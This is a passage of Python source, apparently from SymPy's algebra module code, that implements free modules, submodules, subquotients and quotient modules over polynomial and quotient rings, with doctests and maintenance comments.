        if not isinstance(om, self.__class__) or om.module != self.module:
            try:
                om = self.module.convert(om)
            except CoercionFailed:
                return False
        return self.eq(self.data, om.data)

    def __ne__(self, om):
        return not self.__eq__(om)
##########################################################################
## Free Modules ##########################################################
##########################################################################
class FreeModuleElement(ModuleElement):
    """Element of a free module. Data stored as a tuple of coordinates."""

    def add(self, d1, d2):
        # Componentwise sum of the two coordinate tuples.
        return tuple(a + b for a, b in zip(d1, d2))

    def mul(self, d, p):
        # Scale every coordinate by the ring element ``p``.
        return tuple(c * p for c in d)

    def div(self, d, p):
        return tuple(c / p for c in d)

    def __repr__(self):
        from sympy import sstr
        return '[' + ', '.join(sstr(c) for c in self.data) + ']'

    def __iter__(self):
        return iter(self.data)

    def __getitem__(self, idx):
        return self.data[idx]
class FreeModule(Module):
    """
    Abstract base class for free modules.

    Additional attributes:

    - rank - rank of the free module

    Non-implemented methods:

    - submodule
    """

    dtype = FreeModuleElement

    def __init__(self, ring, rank):
        Module.__init__(self, ring)
        self.rank = rank

    def __repr__(self):
        return repr(self.ring) + "**" + repr(self.rank)

    def is_submodule(self, other):
        """
        Returns True if ``other`` is a submodule of ``self``.

        >>> from sympy.abc import x
        >>> from sympy import QQ
        >>> F = QQ.old_poly_ring(x).free_module(2)
        >>> M = F.submodule([2, x])
        >>> F.is_submodule(F)
        True
        >>> F.is_submodule(M)
        True
        >>> M.is_submodule(F)
        False
        """
        if isinstance(other, SubModule):
            return other.container == self
        if isinstance(other, FreeModule):
            return other.ring == self.ring and other.rank == self.rank
        return False

    def convert(self, elem, M=None):
        """
        Convert ``elem`` into the internal representation.

        This method is called implicitly whenever computations involve elements
        not in the internal representation.

        >>> from sympy.abc import x
        >>> from sympy import QQ
        >>> F = QQ.old_poly_ring(x).free_module(2)
        >>> F.convert([1, 0])
        [1, 0]
        """
        if isinstance(elem, FreeModuleElement):
            if elem.module is self:
                return elem
            if elem.module.rank != self.rank:
                raise CoercionFailed
            return FreeModuleElement(self,
                tuple(self.ring.convert(x, elem.module.ring) for x in elem.data))
        elif iterable(elem):
            tpl = tuple(self.ring.convert(x) for x in elem)
            if len(tpl) != self.rank:
                raise CoercionFailed
            return FreeModuleElement(self, tpl)
        elif elem == 0:
            # BUGFIX: was ``elem is 0`` — identity comparison with an int
            # literal is implementation-dependent and raises SyntaxWarning
            # on modern CPython; equality is the intended check.
            return FreeModuleElement(self, (self.ring.convert(0),)*self.rank)
        else:
            raise CoercionFailed

    def is_zero(self):
        """
        Returns True if ``self`` is a zero module.

        (If, as this implementation assumes, the coefficient ring is not the
        zero ring, then this is equivalent to the rank being zero.)

        >>> from sympy.abc import x
        >>> from sympy import QQ
        >>> QQ.old_poly_ring(x).free_module(0).is_zero()
        True
        >>> QQ.old_poly_ring(x).free_module(1).is_zero()
        False
        """
        return self.rank == 0

    def basis(self):
        """
        Return a set of basis elements.

        >>> from sympy.abc import x
        >>> from sympy import QQ
        >>> QQ.old_poly_ring(x).free_module(3).basis()
        ([1, 0, 0], [0, 1, 0], [0, 0, 1])
        """
        from sympy.matrices import eye
        M = eye(self.rank)
        return tuple(self.convert(M.row(i)) for i in range(self.rank))

    def quotient_module(self, submodule):
        """
        Return a quotient module.

        >>> from sympy.abc import x
        >>> from sympy import QQ
        >>> M = QQ.old_poly_ring(x).free_module(2)
        >>> M.quotient_module(M.submodule([1, x], [x, 2]))
        QQ[x]**2/<[1, x], [x, 2]>

        Or more conicisely, using the overloaded division operator:

        >>> QQ.old_poly_ring(x).free_module(2) / [[1, x], [x, 2]]
        QQ[x]**2/<[1, x], [x, 2]>
        """
        return QuotientModule(self.ring, self, submodule)

    def multiply_ideal(self, other):
        """
        Multiply ``self`` by the ideal ``other``.

        >>> from sympy.abc import x
        >>> from sympy import QQ
        >>> I = QQ.old_poly_ring(x).ideal(x)
        >>> F = QQ.old_poly_ring(x).free_module(2)
        >>> F.multiply_ideal(I)
        <[x, 0], [0, x]>
        """
        return self.submodule(*self.basis()).multiply_ideal(other)

    def identity_hom(self):
        """
        Return the identity homomorphism on ``self``.

        >>> from sympy.abc import x
        >>> from sympy import QQ
        >>> QQ.old_poly_ring(x).free_module(2).identity_hom()
        Matrix([
        [1, 0], : QQ[x]**2 -> QQ[x]**2
        [0, 1]])
        """
        from sympy.polys.agca.homomorphisms import homomorphism
        return homomorphism(self, self, self.basis())
class FreeModulePolyRing(FreeModule):
    """
    Free module over a generalized polynomial ring.

    Do not instantiate this, use the constructor method of the ring instead:

    >>> from sympy.abc import x
    >>> from sympy import QQ
    >>> F = QQ.old_poly_ring(x).free_module(3)
    >>> F
    QQ[x]**3
    >>> F.contains([x, 1, 0])
    True
    >>> F.contains([1/x, 0, 1])
    False
    """

    def __init__(self, ring, rank):
        from sympy.polys.domains.old_polynomialring import PolynomialRingBase
        FreeModule.__init__(self, ring, rank)
        # Submodule computations use Groebner bases, which this code only
        # supports for (old-style) polynomial rings over a ground field.
        if not isinstance(ring, PolynomialRingBase):
            raise NotImplementedError(
                'This implementation only works over polynomial rings, got %s'
                % ring)
        if not isinstance(ring.dom, Field):
            raise NotImplementedError(
                'Ground domain must be a field, got %s' % ring.dom)

    def submodule(self, *gens, **opts):
        """
        Generate a submodule.

        >>> from sympy.abc import x, y
        >>> from sympy import QQ
        >>> M = QQ.old_poly_ring(x, y).free_module(2).submodule([x, x + y])
        >>> M
        <[x, x + y]>
        >>> M.contains([2*x, 2*x + 2*y])
        True
        >>> M.contains([x, y])
        False
        """
        return SubModulePolyRing(gens, self, **opts)
class FreeModuleQuotientRing(FreeModule):
    """
    Free module over a quotient ring.

    Do not instantiate this, use the constructor method of the ring instead:

    >>> from sympy.abc import x
    >>> from sympy import QQ
    >>> F = (QQ.old_poly_ring(x)/[x**2 + 1]).free_module(3)
    >>> F
    (QQ[x]/<x**2 + 1>)**3

    Attributes

    - quot - the quotient module `R^n / IR^n`, where `R/I` is our ring
    """

    def __init__(self, ring, rank):
        from sympy.polys.domains.quotientring import QuotientRing
        FreeModule.__init__(self, ring, rank)
        if not isinstance(ring, QuotientRing):
            raise NotImplementedError('This implementation only works over '
                             + 'quotient rings, got %s' % ring)
        # Model (R/I)**rank as the R-module quotient R**rank / (I * R**rank);
        # lift()/unlift() below translate between the two representations.
        F = self.ring.ring.free_module(self.rank)
        self.quot = F / (self.ring.base_ideal*F)

    def __repr__(self):
        return "(" + repr(self.ring) + ")" + "**" + repr(self.rank)

    def submodule(self, *gens, **opts):
        """
        Generate a submodule.

        >>> from sympy.abc import x, y
        >>> from sympy import QQ
        >>> M = (QQ.old_poly_ring(x, y)/[x**2 - y**2]).free_module(2).submodule([x, x + y])
        >>> M
        <[x + <x**2 - y**2>, x + y + <x**2 - y**2>]>
        >>> M.contains([y**2, x**2 + x*y])
        True
        >>> M.contains([x, y])
        False
        """
        return SubModuleQuotientRing(gens, self, **opts)

    def lift(self, elem):
        """
        Lift the element ``elem`` of self to the module self.quot.

        Note that self.quot is the same set as self, just as an R-module
        and not as an R/I-module, so this makes sense.

        >>> from sympy.abc import x
        >>> from sympy import QQ
        >>> F = (QQ.old_poly_ring(x)/[x**2 + 1]).free_module(2)
        >>> e = F.convert([1, 0])
        >>> e
        [1 + <x**2 + 1>, 0 + <x**2 + 1>]
        >>> L = F.quot
        >>> l = F.lift(e)
        >>> l
        [1, 0] + <[x**2 + 1, 0], [0, x**2 + 1]>
        >>> L.contains(l)
        True
        """
        # Each component of ``elem`` is a coset; ``x.data`` picks the stored
        # representative, which self.quot then wraps as its own coset.
        return self.quot.convert([x.data for x in elem])

    def unlift(self, elem):
        """
        Push down an element of self.quot to self.

        This undoes ``lift``.

        >>> from sympy.abc import x
        >>> from sympy import QQ
        >>> F = (QQ.old_poly_ring(x)/[x**2 + 1]).free_module(2)
        >>> e = F.convert([1, 0])
        >>> l = F.lift(e)
        >>> e == l
        False
        >>> e == F.unlift(l)
        True
        """
        return self.convert(elem.data)
##########################################################################
## Submodules and subquotients ###########################################
##########################################################################
class SubModule(Module):
    """
    Base class for submodules.

    Attributes:

    - container - containing module
    - gens - generators (subset of containing module)
    - rank - rank of containing module

    Non-implemented methods:

    - _contains
    - _syzygies
    - _in_terms_of_generators
    - _intersect
    - _module_quotient

    Methods that likely need change in subclasses:

    - reduce_element
    """

    def __init__(self, gens, container):
        Module.__init__(self, container.ring)
        # Normalise all generators to elements of the containing module.
        self.gens = tuple(container.convert(x) for x in gens)
        self.container = container
        self.rank = container.rank
        self.ring = container.ring
        self.dtype = container.dtype

    def __repr__(self):
        return "<" + ", ".join(repr(x) for x in self.gens) + ">"

    def _contains(self, other):
        """Implementation of containment.
           Other is guaranteed to be FreeModuleElement."""
        raise NotImplementedError

    def _syzygies(self):
        """Implementation of syzygy computation wrt self generators."""
        raise NotImplementedError

    def _in_terms_of_generators(self, e):
        """Implementation of expression in terms of generators."""
        raise NotImplementedError

    def convert(self, elem, M=None):
        """
        Convert ``elem`` into the internal representation.

        Mostly called implicitly.

        >>> from sympy.abc import x
        >>> from sympy import QQ
        >>> M = QQ.old_poly_ring(x).free_module(2).submodule([1, x])
        >>> M.convert([2, 2*x])
        [2, 2*x]
        """
        if isinstance(elem, self.container.dtype) and elem.module is self:
            return elem
        # Convert via the containing module, then rebind the element to this
        # submodule; copy first so the container's element is not mutated.
        r = copy(self.container.convert(elem, M))
        r.module = self
        if not self._contains(r):
            raise CoercionFailed
        return r

    def _intersect(self, other):
        """Implementation of intersection.
           Other is guaranteed to be a submodule of same free module."""
        raise NotImplementedError

    def _module_quotient(self, other):
        """Implementation of quotient.
           Other is guaranteed to be a submodule of same free module."""
        raise NotImplementedError

    def intersect(self, other, **options):
        """
        Returns the intersection of ``self`` with submodule ``other``.

        >>> from sympy.abc import x, y
        >>> from sympy import QQ
        >>> F = QQ.old_poly_ring(x, y).free_module(2)
        >>> F.submodule([x, x]).intersect(F.submodule([y, y]))
        <[x*y, x*y]>

        Some implementations allow further options to be passed. Currently,
        the only one implemented is ``relations=True``, in which case the
        function will return a triple ``(res, rela, relb)``, where ``res`` is
        the intersection module, and ``rela`` and ``relb`` are lists of
        coefficient vectors, expressing the generators of ``res`` in terms of
        the generators of ``self`` (``rela``) and ``other`` (``relb``).

        >>> F.submodule([x, x]).intersect(F.submodule([y, y]), relations=True)
        (<[x*y, x*y]>, [(y,)], [(x,)])

        The above result says: the intersection module is generated by the
        single element `(-xy, -xy) = -y (x, x) = -x (y, y)`, where
        `(x, x)` and `(y, y)` respectively are the unique generators of
        the two modules being intersected.
        """
        if not isinstance(other, SubModule):
            raise TypeError('%s is not a SubModule' % other)
        if other.container != self.container:
            raise ValueError(
                '%s is contained in a different free module' % other)
        return self._intersect(other, **options)

    def module_quotient(self, other, **options):
        r"""
        Returns the module quotient of ``self`` by submodule ``other``.

        That is, if ``self`` is the module `M` and ``other`` is `N`, then
        return the ideal `\{f \in R | fN \subset M\}`.

        >>> from sympy import QQ
        >>> from sympy.abc import x, y
        >>> F = QQ.old_poly_ring(x, y).free_module(2)
        >>> S = F.submodule([x*y, x*y])
        >>> T = F.submodule([x, x])
        >>> S.module_quotient(T)
        <y>

        Some implementations allow further options to be passed. Currently,
        the only one implemented is ``relations=True``, which may only be
        passed if ``other`` is principal. In this case the function
        will return a pair ``(res, rel)`` where ``res`` is the ideal, and
        ``rel`` is a list of coefficient vectors, expressing the generators of
        the ideal, multiplied by the generator of ``other`` in terms of
        generators of ``self``.

        >>> S.module_quotient(T, relations=True)
        (<y>, [[1]])

        This means that the quotient ideal is generated by the single element
        `y`, and that `y (x, x) = 1 (xy, xy)`, `(x, x)` and `(xy, xy)` being
        the generators of `T` and `S`, respectively.
        """
        if not isinstance(other, SubModule):
            raise TypeError('%s is not a SubModule' % other)
        if other.container != self.container:
            raise ValueError(
                '%s is contained in a different free module' % other)
        return self._module_quotient(other, **options)

    def union(self, other):
        """
        Returns the module generated by the union of ``self`` and ``other``.

        >>> from sympy.abc import x
        >>> from sympy import QQ
        >>> F = QQ.old_poly_ring(x).free_module(1)
        >>> M = F.submodule([x**2 + x]) # <x(x+1)>
        >>> N = F.submodule([x**2 - 1]) # <(x-1)(x+1)>
        >>> M.union(N) == F.submodule([x+1])
        True
        """
        if not isinstance(other, SubModule):
            raise TypeError('%s is not a SubModule' % other)
        if other.container != self.container:
            raise ValueError(
                '%s is contained in a different free module' % other)
        # NOTE: builds an instance of the *concrete* subclass, so any extra
        # constructor options of self.__class__ keep their defaults here.
        return self.__class__(self.gens + other.gens, self.container)

    def is_zero(self):
        """
        Return True if ``self`` is a zero module.

        >>> from sympy.abc import x
        >>> from sympy import QQ
        >>> F = QQ.old_poly_ring(x).free_module(2)
        >>> F.submodule([x, 1]).is_zero()
        False
        >>> F.submodule([0, 0]).is_zero()
        True
        """
        return all(x == 0 for x in self.gens)

    def submodule(self, *gens):
        """
        Generate a submodule.

        >>> from sympy.abc import x
        >>> from sympy import QQ
        >>> M = QQ.old_poly_ring(x).free_module(2).submodule([x, 1])
        >>> M.submodule([x**2, x])
        <[x**2, x]>
        """
        if not self.subset(gens):
            raise ValueError('%s not a subset of %s' % (gens, self))
        return self.__class__(gens, self.container)

    def is_full_module(self):
        """
        Return True if ``self`` is the entire free module.

        >>> from sympy.abc import x
        >>> from sympy import QQ
        >>> F = QQ.old_poly_ring(x).free_module(2)
        >>> F.submodule([x, 1]).is_full_module()
        False
        >>> F.submodule([1, 1], [1, 2]).is_full_module()
        True
        """
        # Equality with the container is checked by containing all its
        # basis vectors.
        return all(self.contains(x) for x in self.container.basis())

    def is_submodule(self, other):
        """
        Returns True if ``other`` is a submodule of ``self``.

        >>> from sympy.abc import x
        >>> from sympy import QQ
        >>> F = QQ.old_poly_ring(x).free_module(2)
        >>> M = F.submodule([2, x])
        >>> N = M.submodule([2*x, x**2])
        >>> M.is_submodule(M)
        True
        >>> M.is_submodule(N)
        True
        >>> N.is_submodule(M)
        False
        """
        if isinstance(other, SubModule):
            return self.container == other.container and \
                all(self.contains(x) for x in other.gens)
        if isinstance(other, (FreeModule, QuotientModule)):
            # A full module can only contain another full module over the
            # same container.
            return self.container == other and self.is_full_module()
        return False

    def syzygy_module(self, **opts):
        r"""
        Compute the syzygy module of the generators of ``self``.

        Suppose `M` is generated by `f_1, \dots, f_n` over the ring
        `R`. Consider the homomorphism `\phi: R^n \to M`, given by
        sending `(r_1, \dots, r_n) \to r_1 f_1 + \dots + r_n f_n`.
        The syzygy module is defined to be the kernel of `\phi`.

        The syzygy module is zero iff the generators generate freely a free
        submodule:

        >>> from sympy.abc import x, y
        >>> from sympy import QQ
        >>> QQ.old_poly_ring(x).free_module(2).submodule([1, 0], [1, 1]).syzygy_module().is_zero()
        True

        A slightly more interesting example:

        >>> M = QQ.old_poly_ring(x, y).free_module(2).submodule([x, 2*x], [y, 2*y])
        >>> S = QQ.old_poly_ring(x, y).free_module(2).submodule([y, -x])
        >>> M.syzygy_module() == S
        True
        """
        F = self.ring.free_module(len(self.gens))
        # NOTE we filter out zero syzygies. This is for convenience of the
        # _syzygies function and not meant to replace any real "generating set
        # reduction" algorithm
        return F.submodule(*[x for x in self._syzygies() if F.convert(x) != 0],
                           **opts)

    def in_terms_of_generators(self, e):
        """
        Express element ``e`` of ``self`` in terms of the generators.

        >>> from sympy.abc import x
        >>> from sympy import QQ
        >>> F = QQ.old_poly_ring(x).free_module(2)
        >>> M = F.submodule([1, 0], [1, 1])
        >>> M.in_terms_of_generators([x, x**2])
        [-x**2 + x, x**2]
        """
        try:
            e = self.convert(e)
        except CoercionFailed:
            raise ValueError('%s is not an element of %s' % (e, self))
        return self._in_terms_of_generators(e)

    def reduce_element(self, x):
        """
        Reduce the element ``x`` of our ring modulo the ideal ``self``.

        Here "reduce" has no specific meaning, it could return a unique normal
        form, simplify the expression a bit, or just do nothing.
        """
        # Default: no reduction; subclasses with a normal form override this.
        return x

    def quotient_module(self, other, **opts):
        """
        Return a quotient module.

        This is the same as taking a submodule of a quotient of the containing
        module.

        >>> from sympy.abc import x
        >>> from sympy import QQ
        >>> F = QQ.old_poly_ring(x).free_module(2)
        >>> S1 = F.submodule([x, 1])
        >>> S2 = F.submodule([x**2, x])
        >>> S1.quotient_module(S2)
        <[x, 1] + <[x**2, x]>>

        Or more concisely, using the overloaded division operator:

        >>> F.submodule([x, 1]) / [(x**2, x)]
        <[x, 1] + <[x**2, x]>>
        """
        if not self.is_submodule(other):
            raise ValueError('%s not a submodule of %s' % (other, self))
        return SubQuotientModule(self.gens,
                                 self.container.quotient_module(other), **opts)

    def __add__(self, oth):
        # M + e is interpreted as the coset e + M in container/M.
        return self.container.quotient_module(self).convert(oth)

    __radd__ = __add__

    def multiply_ideal(self, I):
        """
        Multiply ``self`` by the ideal ``I``.

        >>> from sympy.abc import x
        >>> from sympy import QQ
        >>> I = QQ.old_poly_ring(x).ideal(x**2)
        >>> M = QQ.old_poly_ring(x).free_module(2).submodule([1, 1])
        >>> I*M
        <[x**2, x**2]>
        """
        # Ideal generators are stored as rank-1 module elements, hence the
        # destructuring ``for [x] in I._module.gens``.
        return self.submodule(*[x*g for [x] in I._module.gens for g in self.gens])

    def inclusion_hom(self):
        """
        Return a homomorphism representing the inclusion map of ``self``.

        That is, the natural map from ``self`` to ``self.container``.

        >>> from sympy.abc import x
        >>> from sympy import QQ
        >>> QQ.old_poly_ring(x).free_module(2).submodule([x, x]).inclusion_hom()
        Matrix([
        [1, 0], : <[x, x]> -> QQ[x]**2
        [0, 1]])
        """
        return self.container.identity_hom().restrict_domain(self)

    def identity_hom(self):
        """
        Return the identity homomorphism on ``self``.

        >>> from sympy.abc import x
        >>> from sympy import QQ
        >>> QQ.old_poly_ring(x).free_module(2).submodule([x, x]).identity_hom()
        Matrix([
        [1, 0], : <[x, x]> -> <[x, x]>
        [0, 1]])
        """
        return self.container.identity_hom().restrict_domain(
            self).restrict_codomain(self)
class SubQuotientModule(SubModule):
    """
    Submodule of a quotient module.

    Equivalently, quotient module of a submodule.

    Do not instantiate this, instead use the submodule or quotient_module
    constructing methods:

    >>> from sympy.abc import x
    >>> from sympy import QQ
    >>> F = QQ.old_poly_ring(x).free_module(2)
    >>> S = F.submodule([1, 0], [1, x])
    >>> Q = F/[(1, 0)]
    >>> S/[(1, 0)] == Q.submodule([5, x])
    True

    Attributes:

    - base - base module we are quotient of
    - killed_module - submodule used to form the quotient
    """

    def __init__(self, gens, container, **opts):
        SubModule.__init__(self, gens, container)
        self.killed_module = self.container.killed_module
        # XXX it is important for some code below that the generators of base
        # are in this particular order!
        self.base = self.container.base.submodule(
            *[x.data for x in self.gens], **opts).union(self.killed_module)

    def _contains(self, elem):
        # A coset lies in the subquotient iff its representative lies in base
        # (base already includes the killed module, see __init__).
        return self.base.contains(elem.data)

    def _syzygies(self):
        # let N = self.killed_module be generated by e_1, ..., e_r
        # let F = self.base be generated by f_1, ..., f_s and e_1, ..., e_r
        # Then self = F/N.
        # Let phi: R**s --> self be the evident surjection.
        # Similarly psi: R**(s + r) --> F.
        # We need to find generators for ker(phi). Let chi: R**s --> F be the
        # evident lift of phi. For X in R**s, phi(X) = 0 iff chi(X) is
        # contained in N, iff there exists Y in R**r such that
        # psi(X, Y) = 0.
        # Hence if alpha: R**(s + r) --> R**s is the projection map, then
        # ker(phi) = alpha ker(psi).
        return [X[:len(self.gens)] for X in self.base._syzygies()]

    def _in_terms_of_generators(self, e):
        # The first len(self.gens) coefficients returned by base correspond
        # to our generators, by the ordering guaranteed in __init__.
        return self.base._in_terms_of_generators(e.data)[:len(self.gens)]

    def is_full_module(self):
        """
        Return True if ``self`` is the entire free module.

        >>> from sympy.abc import x
        >>> from sympy import QQ
        >>> F = QQ.old_poly_ring(x).free_module(2)
        >>> F.submodule([x, 1]).is_full_module()
        False
        >>> F.submodule([1, 1], [1, 2]).is_full_module()
        True
        """
        return self.base.is_full_module()

    def quotient_hom(self):
        """
        Return the quotient homomorphism to self.

        That is, return the natural map from ``self.base`` to ``self``.

        >>> from sympy.abc import x
        >>> from sympy import QQ
        >>> M = (QQ.old_poly_ring(x).free_module(2) / [(1, x)]).submodule([1, 0])
        >>> M.quotient_hom()
        Matrix([
        [1, 0], : <[1, 0], [1, x]> -> <[1, 0] + <[1, x]>, [1, x] + <[1, x]>>
        [0, 1]])
        """
        return self.base.identity_hom().quotient_codomain(self.killed_module)
_subs0 = lambda x: x[0]
_subs1 = lambda x: x[1:]
class ModuleOrder(ProductOrder):
    """A product monomial order with a zeroth term as module index."""

    def __init__(self, o1, o2, TOP):
        # TOP = "term over position": compare the monomial parts first and
        # use the module index only to break ties; otherwise the module
        # index (position) dominates the comparison.
        if TOP:
            components = ((o2, _subs1), (o1, _subs0))
        else:
            components = ((o1, _subs0), (o2, _subs1))
        ProductOrder.__init__(self, *components)
class SubModulePolyRing(SubModule):
    """
    Submodule of a free module over a generalized polynomial ring.

    Do not instantiate this, use the constructor method of FreeModule instead:

    >>> from sympy.abc import x, y
    >>> from sympy import QQ
    >>> F = QQ.old_poly_ring(x, y).free_module(2)
    >>> F.submodule([x, y], [1, 0])
    <[x, y], [1, 0]>

    Attributes:

    - order - monomial order used
    """

    # self._gb  - cached Groebner (standard) basis, in sdm form
    # self._gbe - cached expression of that basis in terms of the generators

    def __init__(self, gens, container, order="lex", TOP=True):
        SubModule.__init__(self, gens, container)
        if not isinstance(container, FreeModulePolyRing):
            raise NotImplementedError('This implementation is for submodules of '
                             + 'FreeModulePolyRing, got %s' % container)
        self.order = ModuleOrder(monomial_key(order), self.ring.order, TOP)
        self._gb = None
        self._gbe = None

    def __eq__(self, other):
        # Submodules computed with different monomial orders are treated as
        # distinct, even if they are mathematically equal as sets.
        if isinstance(other, SubModulePolyRing) and self.order != other.order:
            return False
        return SubModule.__eq__(self, other)

    def _groebner(self, extended=False):
        """Returns a standard basis in sdm form."""
        from sympy.polys.distributedmodules import sdm_groebner, sdm_nf_mora
        # Compute lazily and cache; the extended computation additionally
        # records how each basis element arises from the generators.
        if self._gbe is None and extended:
            gb, gbe = sdm_groebner(
                [self.ring._vector_to_sdm(x, self.order) for x in self.gens],
                sdm_nf_mora, self.order, self.ring.dom, extended=True)
            self._gb, self._gbe = tuple(gb), tuple(gbe)
        if self._gb is None:
            self._gb = tuple(sdm_groebner(
                [self.ring._vector_to_sdm(x, self.order) for x in self.gens],
                sdm_nf_mora, self.order, self.ring.dom))
        if extended:
            return self._gb, self._gbe
        else:
            return self._gb

    def _groebner_vec(self, extended=False):
        """Returns a standard basis in element form."""
        if not extended:
            return [self.convert(self.ring._sdm_to_vector(x, self.rank))
                    for x in self._groebner()]
        gb, gbe = self._groebner(extended=True)
        return ([self.convert(self.ring._sdm_to_vector(x, self.rank))
                 for x in gb],
                [self.ring._sdm_to_vector(x, len(self.gens)) for x in gbe])

    def _contains(self, x):
        from sympy.polys.distributedmodules import sdm_zero, sdm_nf_mora
        # x is in the submodule iff its normal form wrt a standard basis
        # vanishes.
        return sdm_nf_mora(self.ring._vector_to_sdm(x, self.order),
                           self._groebner(), self.order, self.ring.dom) == \
            sdm_zero()

    def _syzygies(self):
        """Compute syzygies. See [SCA, algorithm 2.5.4]."""
        # NOTE if self.gens is a standard basis, this can be done more
        # efficiently using Schreyer's theorem
        from sympy.matrices import eye

        # First bullet point
        k = len(self.gens)
        r = self.rank
        im = eye(k)
        Rkr = self.ring.free_module(r + k)
        newgens = []
        # Augment each generator f_j with the j-th unit vector, so the extra
        # k components track the coefficients applied to the generators.
        for j, f in enumerate(self.gens):
            m = [0]*(r + k)
            for i, v in enumerate(f):
                m[i] = f[i]
            for i in range(k):
                m[r + i] = im[j, i]
            newgens.append(Rkr.convert(m))
        # Note: we need *descending* order on module index, and TOP=False to
        # get an elimination order
        F = Rkr.submodule(*newgens, order='ilex', TOP=False)

        # Second bullet point: standard basis of F
        G = F._groebner_vec()

        # Third bullet point: G0 = G intersect the new k components
        G0 = [x[r:] for x in G if all(y == self.ring.convert(0)
                                      for y in x[:r])]

        # Fourth and fifth bullet points: we are done
        return G0

    def _in_terms_of_generators(self, e):
        """Expression in terms of generators. See [SCA, 2.8.1]."""
        # NOTE: if gens is a standard basis, this can be done more efficiently
        M = self.ring.free_module(self.rank).submodule(*((e,) + self.gens))
        S = M.syzygy_module(
            order="ilex", TOP=False)  # We want decreasing order!
        G = S._groebner_vec()
        # This list cannot be empty since e is an element
        e = [x for x in G if self.ring.is_unit(x[0])][0]
        return [-x/e[0] for x in e[1:]]

    def reduce_element(self, x, NF=None):
        """
        Reduce the element ``x`` of our container modulo ``self``.

        This applies the normal form ``NF`` to ``x``. If ``NF`` is passed
        as ``None``, the default Mora normal form is used (which is not
        unique!).
        """
        from sympy.polys.distributedmodules import sdm_nf_mora
        if NF is None:
            NF = sdm_nf_mora
        return self.container.convert(self.ring._sdm_to_vector(NF(
            self.ring._vector_to_sdm(x, self.order), self._groebner(),
            self.order, self.ring.dom),
            self.rank))

    def _intersect(self, other, relations=False):
        # See: [SCA, section 2.8.2]
        fi = self.gens
        hi = other.gens
        r = self.rank
        # ci are the "diagonal" generators (e_k, e_k); the syzygies of
        # (ci, di, ei) with nonzero first block encode common elements.
        ci = [[0]*(2*r) for _ in range(r)]
        for k in range(r):
            ci[k][k] = 1
            ci[k][r + k] = 1
        di = [list(f) + [0]*r for f in fi]
        ei = [[0]*r + list(h) for h in hi]
        syz = self.ring.free_module(2*r).submodule(*(ci + di + ei))._syzygies()
        nonzero = [x for x in syz if any(y != self.ring.zero for y in x[:r])]
        res = self.container.submodule(*([-y for y in x[:r]] for x in nonzero))
        reln1 = [x[r:r + len(fi)] for x in nonzero]
        reln2 = [x[r + len(fi):] for x in nonzero]
        if relations:
            return res, reln1, reln2
        return res

    def _module_quotient(self, other, relations=False):
        # See: [SCA, section 2.8.4]
        if relations and len(other.gens) != 1:
            raise NotImplementedError
        if len(other.gens) == 0:
            # (M : 0) is the whole ring.
            return self.ring.ideal(1)
        elif len(other.gens) == 1:
            # We do some trickery. Let f be the (vector!) generating ``other``
            # and f1, .., fn be the (vectors) generating self.
            # Consider the submodule of R^{r+1} generated by (f, 1) and
            # {(fi, 0) | i}. Then the intersection with the last module
            # component yields the quotient.
            g1 = list(other.gens[0]) + [1]
            gi = [list(x) + [0] for x in self.gens]
            # NOTE: We *need* to use an elimination order
            M = self.ring.free_module(self.rank + 1).submodule(*([g1] + gi),
                                            order='ilex', TOP=False)
            if not relations:
                return self.ring.ideal(*[x[-1] for x in M._groebner_vec() if
                                         all(y == self.ring.zero for y in x[:-1])])
            else:
                G, R = M._groebner_vec(extended=True)
                indices = [i for i, x in enumerate(G) if
                           all(y == self.ring.zero for y in x[:-1])]
                return (self.ring.ideal(*[G[i][-1] for i in indices]),
                        [[-x for x in R[i][1:]] for i in indices])
        # For more generators, we use I : <h1, .., hn> = intersection of
        # {I : <hi> | i}
        # TODO this can be done more efficiently
        # NOTE(review): relies on ``reduce`` being in scope (builtin on py2,
        # ``functools.reduce`` on py3) -- confirm the module-level imports.
        return reduce(lambda x, y: x.intersect(y),
                      (self._module_quotient(self.container.submodule(x)) for x in other.gens))
class SubModuleQuotientRing(SubModule):
    """
    Class for submodules of free modules over quotient rings.

    Do not instantiate this. Instead use the submodule methods.

    >>> from sympy.abc import x, y
    >>> from sympy import QQ
    >>> M = (QQ.old_poly_ring(x, y)/[x**2 - y**2]).free_module(2).submodule([x, x + y])
    >>> M
    <[x + <x**2 - y**2>, x + y + <x**2 - y**2>]>
    >>> M.contains([y**2, x**2 + x*y])
    True
    >>> M.contains([x, y])
    False

    Attributes:

    - quot - the subquotient of `R^n/IR^n` generated by lifts of our generators
    """

    def __init__(self, gens, container):
        SubModule.__init__(self, gens, container)
        # All computations are delegated to the R-module subquotient spanned
        # by lifts of our generators (see FreeModuleQuotientRing.lift).
        self.quot = self.container.quot.submodule(
            *[self.container.lift(x) for x in self.gens])

    def _contains(self, elem):
        return self.quot._contains(self.container.lift(elem))

    def _syzygies(self):
        # Syzygies of the lifted generators, pushed back down into R/I.
        return [tuple(self.ring.convert(y, self.quot.ring) for y in x)
                for x in self.quot._syzygies()]

    def _in_terms_of_generators(self, elem):
        return [self.ring.convert(x, self.quot.ring) for x in
                self.quot._in_terms_of_generators(self.container.lift(elem))]
##########################################################################
## Quotient Modules ######################################################
##########################################################################
class QuotientModuleElement(ModuleElement):
    """Element of a quotient module."""

    def eq(self, d1, d2):
        """Equality comparison: two cosets agree iff their difference is killed."""
        difference = d1 - d2
        return self.module.killed_module.contains(difference)

    def __repr__(self):
        return "%s + %s" % (repr(self.data), repr(self.module.killed_module))
class QuotientModule(Module):
    """
    Class for quotient modules.

    Do not instantiate this directly. For subquotients, see the
    SubQuotientModule class.

    Attributes:

    - base - the base module we are a quotient of
    - killed_module - the submodule used to form the quotient
    - rank of the base
    """

    dtype = QuotientModuleElement

    def __init__(self, ring, base, submodule):
        Module.__init__(self, ring)
        if not base.is_submodule(submodule):
            raise ValueError('%s is not a submodule of %s' % (submodule, base))
        self.base = base
        self.killed_module = submodule
        # By convention the quotient carries the rank of the base module.
        self.rank = base.rank

    def __repr__(self):
        return repr(self.base) + "/" + repr(self.killed_module)

    def is_zero(self):
        """
        Return True if ``self`` is a zero module.

        This happens if and only if the base module is the same as the
        submodule being killed.

        >>> from sympy.abc import x
        >>> from sympy import QQ
        >>> F = QQ.old_poly_ring(x).free_module(2)
        >>> (F/[(1, 0)]).is_zero()
        False
        >>> (F/[(1, 0), (0, 1)]).is_zero()
        True
        """
        return self.base == self.killed_module

    def is_submodule(self, other):
        """
        Return True if ``other`` is a submodule of ``self``.

        >>> from sympy.abc import x
        >>> from sympy import QQ
        >>> Q = QQ.old_poly_ring(x).free_module(2) / [(x, x)]
        >>> S = Q.submodule([1, 0])
